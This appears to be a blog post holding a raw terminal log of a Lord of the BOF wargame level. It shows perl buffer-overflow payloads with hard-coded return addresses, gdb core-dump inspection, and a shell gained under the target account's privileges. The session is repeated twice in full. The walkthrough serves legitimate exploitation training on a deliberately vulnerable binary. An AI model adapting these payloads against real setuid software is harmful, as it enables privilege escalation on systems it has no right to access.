Xshell 4 (Build 0127)
Copyright (c) 2002-2013 NetSarang Computer, Inc. All rights reserved.
Type `help' to learn how to use Xshell prompt.
Xshell:\>
Connecting to 192.168.232.128:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
_______________________
_______________________------------------- `\
/:--__ |
||< > | ___________________________/
| \__/_________________------------------- |
| |
| The Lord of the BOF : The Fellowship of the BOF, 2010 |
| |
| |
| [enter to the dungeon] |
| gate : gate |
| |
| [RULE] |
| - do not use local root exploit |
| - do not use LD_PRELOAD to my-pass |
| - do not use single boot [h4ck3rsch001] |
| ____________________|_
| ___________________------------------------- `\
|/`--_ |
||[ ]|| ___________________/
\===/___________________--------------------------
login: assassin
Password:
Last login: Fri Sep 6 14:24:49 from 192.168.232.1
[assassin@localhost assassin]$ bash2
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ ls
core fs fs.c zombie_assassin
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵?.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...Xshelldone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x0 in ?? ()
(gdb) x/1000s 0xbffffb00
0xbffffb00: "\225?엔?풾??205?엔?옇?왠?욍?웡??016?026???풪?퓀?오왔?
0xbffffb51: ""
0xbffffb52: ""
0xbffffb53: ""
0xbffffb54: "\003"
0xbffffb56: ""
0xbffffb57: ""
0xbffffb58: "4\200\004\b\004"
0xbffffb5e: ""
0xbffffb5f: ""
0xbffffb60: " "
0xbffffb62: ""
0xbffffb63: ""
0xbffffb64: "\005"
0xbffffb66: ""
0xbffffb67: ""
0xbffffb68: "\006"
0xbffffb6a: ""
0xbffffb6b: ""
0xbffffb6c: "\006"
0xbffffb6e: ""
0xbffffb6f: ""
0xbffffb70: ""
0xbffffb71: "\020"
0xbffffb73: ""
0xbffffb74: "\a"
0xbffffb76: ""
0xbffffb77: ""
0xbffffb78: ""
0xbffffb79: ""
---Type <return> to continue, or q <return> to quit---
0xbffffb7a: ""
0xbffffb7b: "@\b"
0xbffffb7e: ""
0xbffffb7f: ""
0xbffffb80: ""
0xbffffb81: ""
0xbffffb82: ""
0xbffffb83: ""
0xbffffb84: "\t"
0xbffffb86: ""
0xbffffb87: ""
0xbffffb88: "\220\203\004\b\013"
0xbffffb8e: ""
0xbffffb8f: ""
0xbffffb90: "\003\002"
0xbffffb93: ""
0xbffffb94: "\f"
0xbffffb96: ""
0xbffffb97: ""
0xbffffb98: "\003\002"
0xbffffb9b: ""
0xbffffb9c: "\r"
0xbffffb9e: ""
0xbffffb9f: ""
0xbffffba0: "\003\002"
0xbffffba3: ""
0xbffffba4: "\016"
0xbffffba6: ""
0xbffffba7: ""
0xbffffba8: "\003\002"
---Type <return> to continue, or q <return> to quit---
0xbffffbab: ""
0xbffffbac: "\020"
0xbffffbae: ""
0xbffffbaf: ""
0xbffffbb0: "魂\017\017"
0xbffffbb6: ""
0xbffffbb7: ""
0xbffffbb8: "珹?
0xbffffbbd: ""
0xbffffbbe: ""
0xbffffbbf: ""
0xbffffbc0: ""
0xbffffbc1: ""
0xbffffbc2: ""
0xbffffbc3: ""
0xbffffbc4: ""
0xbffffbc5: ""
0xbffffbc6: ""
0xbffffbc7: ""
0xbffffbc8: ""
0xbffffbc9: ""
0xbffffbca: ""
0xbffffbcb: ""
0xbffffbcc: ""
0xbffffbcd: ""
0xbffffbce: ""
0xbffffbcf: ""
0xbffffbd0: ""
0xbffffbd1: ""
0xbffffbd2: ""
---Type <return> to continue, or q <return> to quit---
0xbffffbd3: ""
0xbffffbd4: ""
0xbffffbd5: ""
0xbffffbd6: ""
0xbffffbd7: ""
0xbffffbd8: ""
0xbffffbd9: ""
0xbffffbda: ""
0xbffffbdb: ""
0xbffffbdc: ""
0xbffffbdd: ""
0xbffffbde: ""
0xbffffbdf: ""
0xbffffbe0: "i686"
0xbffffbe5: "./zombie_assassin"
0xbffffbf7: "aaaa?212\005@bbbb廈\017@", 'b' <repeats 24 times>, "釵?
0xbffffc24: "PWD=/home/assassin/tmp"
0xbffffc3b: "REMOTEHOST=192.168.232.1"
0xbffffc54: "HOSTNAME=localhost.localdomain"
0xbffffc73: "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffc95: "USER=assassin"
0xbffffca3: "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffd6b: ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbffffe33: "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbffffe66: "MACHTYPE=i386-redhat-linux-gnu"
0xbffffe85: "MAIL=/var/spool/mail/assassin"
0xbffffea3: "INPUTRC=/etc/inputrc"
0xbffffeb8: "BASH_ENV=/home/assassin/.bashrc"
---Type <return> to continue, or q <return> to quit---ㅂ
0xbffffed8: "LANG=en_US"
0xbffffee3: "DISPLAY=192.168.232.1:0.0"
0xbffffefd: "LOGNAME=assassin"
0xbfffff0e: "SHLVL=2"
0xbfffff16: "USERNAME="
0xbfffff20: "SHELL=/bin/bash"
0xbfffff30: "HOSTTYPE=i386"
0xbfffff3e: "HISTSIZE=1000"
0xbfffff4c: "OSTYPE=linux-gnu"
0xbfffff5d: "TERM=xterm"
0xbfffff68: "HOME=/home/assassin"
0xbfffff7c: "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/assassin/bin"
0xbfffffc0: "_=./zombie_assassin"
0xbfffffd4: "OLDPWD=/home/assassin"
0xbfffffea: "./zombie_assassin"
0xbffffffc: ""
0xbffffffd: ""
0xbffffffe: ""
0xbfffffff: ""
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/100x 0xbfffffb7
0xbfffffb7: 0x6e697373 0x6e69622f 0x2e3d5f00 0x6d6f7a2f
0xbfffffc7: 0x5f656962 0x61737361 0x6e697373 0x444c4f00
0xbfffffd7: 0x3d445750 0x6d6f682f 0x73612f65 0x73736173
0xbfffffe7: 0x2e006e69 0x6d6f7a2f 0x5f656962 0x61737361
0xbffffff7: 0x6e697373 0x00000000 Cannot access memory at address 0xbfffffff
(gdb) x/100x 0xbffffbf7
0xbffffbf7: 0x61616161 0x40058ae0 0x62626262 0x400fbff9
0xbffffc07: 0x62626262 0x62626262 0x62626262 0x62626262
0xbffffc17: 0x62626262 0x62626262 0xbffffbf3 0x44575000
0xbffffc27: 0x6f682f3d 0x612f656d 0x73617373 0x2f6e6973
0xbffffc37: 0x00706d74 0x4f4d4552 0x4f484554 0x313d5453
0xbffffc47: 0x312e3239 0x322e3836 0x312e3233 0x534f4800
0xbffffc57: 0x4d414e54 0x6f6c3d45 0x686c6163 0x2e74736f
0xbffffc67: 0x61636f6c 0x6d6f646c 0x006e6961 0x5353454c
0xbffffc77: 0x4e45504f 0x752f7c3d 0x622f7273 0x6c2f6e69
0xbffffc87: 0x70737365 0x2e657069 0x25206873 0x53550073
0xbffffc97: 0x613d5245 0x73617373 0x006e6973 0x435f534c
0xbffffca7: 0x524f4c4f 0x6f6e3d53 0x3a30303d 0x303d6966
0xbffffcb7: 0x69643a30 0x3b31303d 0x6c3a3433 0x31303d6e
0xbffffcc7: 0x3a36333b 0x343d6970 0x33333b30 0x3d6f733a
0xbffffcd7: 0x333b3130 0x64623a35 0x3b30343d 0x303b3333
0xbffffce7: 0x64633a31 0x3b30343d 0x303b3333 0x726f3a31
0xbffffcf7: 0x3b31303d 0x333b3530 0x31343b37 0x3d696d3a
0xbffffd07: 0x303b3130 0x37333b35 0x3a31343b 0x303d7865
0xbffffd17: 0x32333b31 0x632e2a3a 0x303d646d 0x32333b31
0xbffffd27: 0x652e2a3a 0x303d6578 0x32333b31 0x632e2a3a
0xbffffd37: 0x303d6d6f 0x32333b31 0x622e2a3a 0x303d6d74
0xbffffd47: 0x32333b31 0x622e2a3a 0x303d7461 0x32333b31
0xbffffd57: 0x732e2a3a 0x31303d68 0x3a32333b 0x73632e2a
0xbffffd67: 0x31303d68 0x3a32333b 0x61742e2a 0x31303d72
0xbffffd77: 0x3a31333b 0x67742e2a 0x31303d7a 0x3a31333b
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf7\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?
Segmentation fault (core dumped)
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...Xshelldone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x62626262 in ?? ()
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ exit
exit
Segmentation fault (core dumped)
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ Xq
sh: Xq: command not found
bash$ exit
exit
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by ` aaaaaaaabbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x62626262 in ?? ()
(gdb) x/100x 0xbffffbf3
0xbffffbf3: 0x61616161 0x61616161 0x62626262 0x400fbff9
0xbffffc03: 0x62626262 0x62626262 0x62626262 0x62626262
0xbffffc13: 0x62626262 0x62626262 0xbffffbf3 0x080484df
0xbffffc23: 0x44575000 0x6f682f3d 0x612f656d 0x73617373
0xbffffc33: 0x2f6e6973 0x00706d74 0x4f4d4552 0x4f484554
0xbffffc43: 0x313d5453 0x312e3239 0x322e3836 0x312e3233
0xbffffc53: 0x534f4800 0x4d414e54 0x6f6c3d45 0x686c6163
0xbffffc63: 0x2e74736f 0x61636f6c 0x6d6f646c 0x006e6961
0xbffffc73: 0x5353454c 0x4e45504f 0x752f7c3d 0x622f7273
0xbffffc83: 0x6c2f6e69 0x70737365 0x2e657069 0x25206873
0xbffffc93: 0x53550073 0x613d5245 0x73617373 0x006e6973
0xbffffca3: 0x435f534c 0x524f4c4f 0x6f6e3d53 0x3a30303d
0xbffffcb3: 0x303d6966 0x69643a30 0x3b31303d 0x6c3a3433
0xbffffcc3: 0x31303d6e 0x3a36333b 0x343d6970 0x33333b30
0xbffffcd3: 0x3d6f733a 0x333b3130 0x64623a35 0x3b30343d
0xbffffce3: 0x303b3333 0x64633a31 0x3b30343d 0x303b3333
0xbffffcf3: 0x726f3a31 0x3b31303d 0x333b3530 0x31343b37
0xbffffd03: 0x3d696d3a 0x303b3130 0x37333b35 0x3a31343b
0xbffffd13: 0x303d7865 0x32333b31 0x632e2a3a 0x303d646d
0xbffffd23: 0x32333b31 0x652e2a3a 0x303d6578 0x32333b31
0xbffffd33: 0x632e2a3a 0x303d6d6f 0x32333b31 0x622e2a3a
0xbffffd43: 0x303d6d74 0x32333b31 0x622e2a3a 0x303d7461
0xbffffd53: 0x32333b31 0x732e2a3a 0x31303d68 0x3a32333b
0xbffffd63: 0x73632e2a 0x31303d68 0x3a32333b 0x61742e2a
0xbffffd73: 0x31303d72 0x3a31333b 0x67742e2a 0x31303d7a
(gdb) x/x 0xbffffbf3
0xbffffbf3: 0x61616161
(gdb)
0xbffffbf7: 0x61616161
(gdb)
0xbffffbfb: 0x62626262
(gdb)
0xbffffbff: 0x400fbff9
(gdb) x/x 0xbffffbf3+4
0xbffffbf7: 0x61616161
(gdb)
0xbffffbfb: 0x62626262
(gdb)
0xbffffbff: 0x400fbff9
(gdb)
0xbffffc03: 0x62626262
(gdb) q
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ id
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$
Copyright (c) 2002-2013 NetSarang Computer, Inc. All rights reserved.
Type `help' to learn how to use Xshell prompt.
Xshell:\>
Connecting to 192.168.232.128:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
_______________________
_______________________------------------- `\
/:--__ |
||< > | ___________________________/
| \__/_________________------------------- |
| |
| The Lord of the BOF : The Fellowship of the BOF, 2010 |
| |
| |
| [enter to the dungeon] |
| gate : gate |
| |
| [RULE] |
| - do not use local root exploit |
| - do not use LD_PRELOAD to my-pass |
| - do not use single boot [h4ck3rsch001] |
| ____________________|_
| ___________________------------------------- `\
|/`--_ |
||[ ]|| ___________________/
\===/___________________--------------------------
login: assassin
Password:
Last login: Fri Sep 6 14:24:49 from 192.168.232.1
[assassin@localhost assassin]$ bash2
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ ls
core fs fs.c zombie_assassin
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵?.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...Xshelldone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x0 in ?? ()
(gdb) x/1000s 0xbffffb00
0xbffffb00: "\225?엔?풾??205?엔?옇?왠?욍?웡??016?026???풪?퓀?오왔?
0xbffffb51: ""
0xbffffb52: ""
0xbffffb53: ""
0xbffffb54: "\003"
0xbffffb56: ""
0xbffffb57: ""
0xbffffb58: "4\200\004\b\004"
0xbffffb5e: ""
0xbffffb5f: ""
0xbffffb60: " "
0xbffffb62: ""
0xbffffb63: ""
0xbffffb64: "\005"
0xbffffb66: ""
0xbffffb67: ""
0xbffffb68: "\006"
0xbffffb6a: ""
0xbffffb6b: ""
0xbffffb6c: "\006"
0xbffffb6e: ""
0xbffffb6f: ""
0xbffffb70: ""
0xbffffb71: "\020"
0xbffffb73: ""
0xbffffb74: "\a"
0xbffffb76: ""
0xbffffb77: ""
0xbffffb78: ""
0xbffffb79: ""
---Type <return> to continue, or q <return> to quit---
0xbffffb7a: ""
0xbffffb7b: "@\b"
0xbffffb7e: ""
0xbffffb7f: ""
0xbffffb80: ""
0xbffffb81: ""
0xbffffb82: ""
0xbffffb83: ""
0xbffffb84: "\t"
0xbffffb86: ""
0xbffffb87: ""
0xbffffb88: "\220\203\004\b\013"
0xbffffb8e: ""
0xbffffb8f: ""
0xbffffb90: "\003\002"
0xbffffb93: ""
0xbffffb94: "\f"
0xbffffb96: ""
0xbffffb97: ""
0xbffffb98: "\003\002"
0xbffffb9b: ""
0xbffffb9c: "\r"
0xbffffb9e: ""
0xbffffb9f: ""
0xbffffba0: "\003\002"
0xbffffba3: ""
0xbffffba4: "\016"
0xbffffba6: ""
0xbffffba7: ""
0xbffffba8: "\003\002"
---Type <return> to continue, or q <return> to quit---
0xbffffbab: ""
0xbffffbac: "\020"
0xbffffbae: ""
0xbffffbaf: ""
0xbffffbb0: "魂\017\017"
0xbffffbb6: ""
0xbffffbb7: ""
0xbffffbb8: "珹?
0xbffffbbd: ""
0xbffffbbe: ""
0xbffffbbf: ""
0xbffffbc0: ""
0xbffffbc1: ""
0xbffffbc2: ""
0xbffffbc3: ""
0xbffffbc4: ""
0xbffffbc5: ""
0xbffffbc6: ""
0xbffffbc7: ""
0xbffffbc8: ""
0xbffffbc9: ""
0xbffffbca: ""
0xbffffbcb: ""
0xbffffbcc: ""
0xbffffbcd: ""
0xbffffbce: ""
0xbffffbcf: ""
0xbffffbd0: ""
0xbffffbd1: ""
0xbffffbd2: ""
---Type <return> to continue, or q <return> to quit---
0xbffffbd3: ""
0xbffffbd4: ""
0xbffffbd5: ""
0xbffffbd6: ""
0xbffffbd7: ""
0xbffffbd8: ""
0xbffffbd9: ""
0xbffffbda: ""
0xbffffbdb: ""
0xbffffbdc: ""
0xbffffbdd: ""
0xbffffbde: ""
0xbffffbdf: ""
0xbffffbe0: "i686"
0xbffffbe5: "./zombie_assassin"
0xbffffbf7: "aaaa?212\005@bbbb廈\017@", 'b' <repeats 24 times>, "釵?
0xbffffc24: "PWD=/home/assassin/tmp"
0xbffffc3b: "REMOTEHOST=192.168.232.1"
0xbffffc54: "HOSTNAME=localhost.localdomain"
0xbffffc73: "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffc95: "USER=assassin"
0xbffffca3: "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffd6b: ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbffffe33: "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbffffe66: "MACHTYPE=i386-redhat-linux-gnu"
0xbffffe85: "MAIL=/var/spool/mail/assassin"
0xbffffea3: "INPUTRC=/etc/inputrc"
0xbffffeb8: "BASH_ENV=/home/assassin/.bashrc"
---Type <return> to continue, or q <return> to quit---ㅂ
0xbffffed8: "LANG=en_US"
0xbffffee3: "DISPLAY=192.168.232.1:0.0"
0xbffffefd: "LOGNAME=assassin"
0xbfffff0e: "SHLVL=2"
0xbfffff16: "USERNAME="
0xbfffff20: "SHELL=/bin/bash"
0xbfffff30: "HOSTTYPE=i386"
0xbfffff3e: "HISTSIZE=1000"
0xbfffff4c: "OSTYPE=linux-gnu"
0xbfffff5d: "TERM=xterm"
0xbfffff68: "HOME=/home/assassin"
0xbfffff7c: "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/assassin/bin"
0xbfffffc0: "_=./zombie_assassin"
0xbfffffd4: "OLDPWD=/home/assassin"
0xbfffffea: "./zombie_assassin"
0xbffffffc: ""
0xbffffffd: ""
0xbffffffe: ""
0xbfffffff: ""
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/100x 0xbfffffb7
0xbfffffb7: 0x6e697373 0x6e69622f 0x2e3d5f00 0x6d6f7a2f
0xbfffffc7: 0x5f656962 0x61737361 0x6e697373 0x444c4f00
0xbfffffd7: 0x3d445750 0x6d6f682f 0x73612f65 0x73736173
0xbfffffe7: 0x2e006e69 0x6d6f7a2f 0x5f656962 0x61737361
0xbffffff7: 0x6e697373 0x00000000 Cannot access memory at address 0xbfffffff
(gdb) x/100x 0xbffffbf7
0xbffffbf7: 0x61616161 0x40058ae0 0x62626262 0x400fbff9
0xbffffc07: 0x62626262 0x62626262 0x62626262 0x62626262
0xbffffc17: 0x62626262 0x62626262 0xbffffbf3 0x44575000
0xbffffc27: 0x6f682f3d 0x612f656d 0x73617373 0x2f6e6973
0xbffffc37: 0x00706d74 0x4f4d4552 0x4f484554 0x313d5453
0xbffffc47: 0x312e3239 0x322e3836 0x312e3233 0x534f4800
0xbffffc57: 0x4d414e54 0x6f6c3d45 0x686c6163 0x2e74736f
0xbffffc67: 0x61636f6c 0x6d6f646c 0x006e6961 0x5353454c
0xbffffc77: 0x4e45504f 0x752f7c3d 0x622f7273 0x6c2f6e69
0xbffffc87: 0x70737365 0x2e657069 0x25206873 0x53550073
0xbffffc97: 0x613d5245 0x73617373 0x006e6973 0x435f534c
0xbffffca7: 0x524f4c4f 0x6f6e3d53 0x3a30303d 0x303d6966
0xbffffcb7: 0x69643a30 0x3b31303d 0x6c3a3433 0x31303d6e
0xbffffcc7: 0x3a36333b 0x343d6970 0x33333b30 0x3d6f733a
0xbffffcd7: 0x333b3130 0x64623a35 0x3b30343d 0x303b3333
0xbffffce7: 0x64633a31 0x3b30343d 0x303b3333 0x726f3a31
0xbffffcf7: 0x3b31303d 0x333b3530 0x31343b37 0x3d696d3a
0xbffffd07: 0x303b3130 0x37333b35 0x3a31343b 0x303d7865
0xbffffd17: 0x32333b31 0x632e2a3a 0x303d646d 0x32333b31
0xbffffd27: 0x652e2a3a 0x303d6578 0x32333b31 0x632e2a3a
0xbffffd37: 0x303d6d6f 0x32333b31 0x622e2a3a 0x303d6d74
0xbffffd47: 0x32333b31 0x622e2a3a 0x303d7461 0x32333b31
0xbffffd57: 0x732e2a3a 0x31303d68 0x3a32333b 0x73632e2a
0xbffffd67: 0x31303d68 0x3a32333b 0x61742e2a 0x31303d72
0xbffffd77: 0x3a31333b 0x67742e2a 0x31303d7a 0x3a31333b
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf7\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?
Segmentation fault (core dumped)
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...Xshelldone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x62626262 in ?? ()
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ exit
exit
Segmentation fault (core dumped)
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ Xq
sh: Xq: command not found
bash$ exit
exit
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by ` aaaaaaaabbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x62626262 in ?? ()
(gdb) x/100x 0xbffffbf3
0xbffffbf3: 0x61616161 0x61616161 0x62626262 0x400fbff9
0xbffffc03: 0x62626262 0x62626262 0x62626262 0x62626262
0xbffffc13: 0x62626262 0x62626262 0xbffffbf3 0x080484df
0xbffffc23: 0x44575000 0x6f682f3d 0x612f656d 0x73617373
0xbffffc33: 0x2f6e6973 0x00706d74 0x4f4d4552 0x4f484554
0xbffffc43: 0x313d5453 0x312e3239 0x322e3836 0x312e3233
0xbffffc53: 0x534f4800 0x4d414e54 0x6f6c3d45 0x686c6163
0xbffffc63: 0x2e74736f 0x61636f6c 0x6d6f646c 0x006e6961
0xbffffc73: 0x5353454c 0x4e45504f 0x752f7c3d 0x622f7273
0xbffffc83: 0x6c2f6e69 0x70737365 0x2e657069 0x25206873
0xbffffc93: 0x53550073 0x613d5245 0x73617373 0x006e6973
0xbffffca3: 0x435f534c 0x524f4c4f 0x6f6e3d53 0x3a30303d
0xbffffcb3: 0x303d6966 0x69643a30 0x3b31303d 0x6c3a3433
0xbffffcc3: 0x31303d6e 0x3a36333b 0x343d6970 0x33333b30
0xbffffcd3: 0x3d6f733a 0x333b3130 0x64623a35 0x3b30343d
0xbffffce3: 0x303b3333 0x64633a31 0x3b30343d 0x303b3333
0xbffffcf3: 0x726f3a31 0x3b31303d 0x333b3530 0x31343b37
0xbffffd03: 0x3d696d3a 0x303b3130 0x37333b35 0x3a31343b
0xbffffd13: 0x303d7865 0x32333b31 0x632e2a3a 0x303d646d
0xbffffd23: 0x32333b31 0x652e2a3a 0x303d6578 0x32333b31
0xbffffd33: 0x632e2a3a 0x303d6d6f 0x32333b31 0x622e2a3a
0xbffffd43: 0x303d6d74 0x32333b31 0x622e2a3a 0x303d7461
0xbffffd53: 0x32333b31 0x732e2a3a 0x31303d68 0x3a32333b
0xbffffd63: 0x73632e2a 0x31303d68 0x3a32333b 0x61742e2a
0xbffffd73: 0x31303d72 0x3a31333b 0x67742e2a 0x31303d7a
(gdb) x/x 0xbffffbf3
0xbffffbf3: 0x61616161
(gdb)
0xbffffbf7: 0x61616161
(gdb)
0xbffffbfb: 0x62626262
(gdb)
0xbffffbff: 0x400fbff9
(gdb) x/x 0xbffffbf3+4
0xbffffbf7: 0x61616161
(gdb)
0xbffffbfb: 0x62626262
(gdb)
0xbffffbff: 0x400fbff9
(gdb)
0xbffffc03: 0x62626262
(gdb) q
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ id
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| succubus -> nightmare (0) | 2014.02.20 |
|---|---|
| zombie_assassin -> succubus (0) | 2014.02.20 |
| giant -> assassin (0) | 2014.02.20 |
| bugbear -> giant (0) | 2014.02.20 |
| darkknight -> bugbear (0) | 2014.02.20 |
